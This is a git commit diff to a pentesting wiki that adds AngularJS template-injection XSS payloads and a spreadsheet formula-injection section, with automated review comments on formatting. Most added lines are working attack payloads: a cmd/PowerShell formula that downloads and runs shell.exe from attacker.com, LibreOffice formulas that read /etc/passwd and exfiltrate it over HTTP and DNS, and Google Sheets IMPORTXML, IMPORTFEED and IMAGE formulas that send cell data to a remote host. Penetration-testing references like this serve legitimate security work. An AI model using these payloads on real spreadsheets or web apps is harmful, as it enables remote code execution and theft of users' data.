GitBook: [master] 2 pages modified

This commit is contained in:
CPol 2021-06-29 12:49:13 +00:00 committed by gitbook-bot
parent 45f8827eee
commit bc72708577
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 73 additions and 0 deletions

View file

@ -16,6 +16,7 @@ You can **execute arbitrary JavaScript** code using curly braces **adding** to t
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>
<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
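Review bot: the two payload lines added in this hunk (`<input ng-focus=...>` and the `<div ng-app ng-csp>...` block) are HTML markup, but the fence they land in is tagged `javascript`, so they will be mis-highlighted; move them into an `html` fence or retag the block. The `<!-- Google Research - AngularJS -->` comment credits a source without a link, and the `d.location='//localhost/mH/'` destination on the same line reads like a left-over test value rather than a documented placeholder; add the source URL and mark the host as a placeholder.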
@ -23,6 +24,10 @@ You can **execute arbitrary JavaScript** code using curly braces **adding** to t
You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)
{% hint style="danger" %}
\*\*\*\*[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
{% endhint %}
### VueJS
You can find a **vulnerable vue.js** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh/)
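Review bot: the hint body opens with `\*\*\*\*`, four escaped asterisks that render as a literal `****` in front of the link; remove them. The link target also carries a `#:~:text=...` text-fragment anchor, which only highlights a quote in some browsers and breaks silently when the post's wording changes, so link to the article URL alone. The new `### VueJS` heading follows `{% endhint %}` with no blank line, and the subsection is a single link with no statement of what the linked demo shows; one sentence describing the example would make it readable without leaving the page.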

View file

@ -43,3 +43,71 @@ It's possible to execute a calculator with the following payload **`=cmd|' /C ca
![](../.gitbook/assets/image%20%2825%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29%20%281%29.png)
### More
```bash
=cmd|' /C powershell Invoke-WebRequest "http://www.attacker.com/shell.exe" -OutFile "$env:Temp\shell.exe"; Start-Process "$env:Temp\shell.exe"'!A1
```
## LFI
#### LibreOffice Calc
* This will read the 1st line from the local /etc/passwd file: `='file:///etc/passwd'#$passwd.A1`
* Ex-filtrate it: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)))`
* Ex-filtrate more than one line: `=WEBSERVICE(CONCATENATE("http://:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))`
* DNS Exfiltration: `=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),"."))`
**Analyzing the DNS ex-filtration payload:**
* file:///etc/passwd\#$passwd.A19 Will read the 19th line from the local /etc/passwd file
* ENCODEURL\(file:///etc/passwd\#$passwd.A19\) URL encode the returned data
* MID\(\(ENCODEURL\(file:///etc/passwd\#$passwd.A19\)\),1,41\) Similar to substring, read data from 1st character to 41st a very handy way to restrict the length of DNS hostnames \(254 character limit on FQDN and 63 characters for a label, i.e. subdomain\)
* SUBSTITUTE\(MID\(\(ENCODEURL\(file:///etc/passwd\#$passwd.A19\)\),1,41\),”%”,”-“\) replace all instances of % \(the special character from URL encoding\) with dash this is ensure that only valid DNS characters are used
* CONCATENATE\(\(SUBSTITUTE\(MID\(\(ENCODEURL\(file:///etc/passwd\#$passwd.A19\)\),1,41\),”%”,”-“\)\),”.&lt;FQDN&gt;”\) Concatenate the output from the file \(after the above processing has taken place\) with the FQDN \(for which we have access to the host that is authoritative for the domain\)
* WEBSERVICE Will make a request for this non-existent DNS name which we can then parse the logs \(or run tcpdump etc.\) on the DNS authoritative name server for which we have control
## Google Sheets OOB Data Exfiltration
Firstly, lets introduce some of the more interesting functions.
**CONCATENATE**: Appends strings to one another.
```text
=CONCATENATE(A2:E2)
```
**IMPORTXML**: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.
```text
=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
```
**IMPORTFEED**: Imports a RSS or ATOM feed.
```text
=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))
```
**IMPORTHTML**: Imports data from a table or list within an HTML page.
```text
=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
```
**IMPORTRANGE**: Imports a range of cells from a specified spreadsheet.
```text
=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
```
**IMAGE**: Inserts an image into a cell.
```text
=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")
```
## References
{% embed url="https://notsosecure.com/data-exfiltration-formula-injection/" %}
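Review bot: the two WEBSERVICE payloads under `#### LibreOffice Calc` use `http://:8080/`, a URL with an empty host, so the placeholder for the listening server was lost; write it as `http://<your-host>:8080/` or similar. The DNS exfiltration formula ends in `CONCATENATE(..., ".")` while the step-by-step analysis below it describes `".<FQDN>"`, so formula and explanation disagree; align them. The analysis bullets are full of markdown escaping residue (`\(`, `\)`, `\#`), curly quotes `”%”,”-“` that differ from the straight quotes in the formula, and the HTML entity `&lt;FQDN&gt;`; render them as plain text so each step can be compared against the formula above. Minor: `=IMPORTHTML (` has a stray space before the parenthesis, and the IMPORTFEED URL has a doubled slash (`//123.txt`).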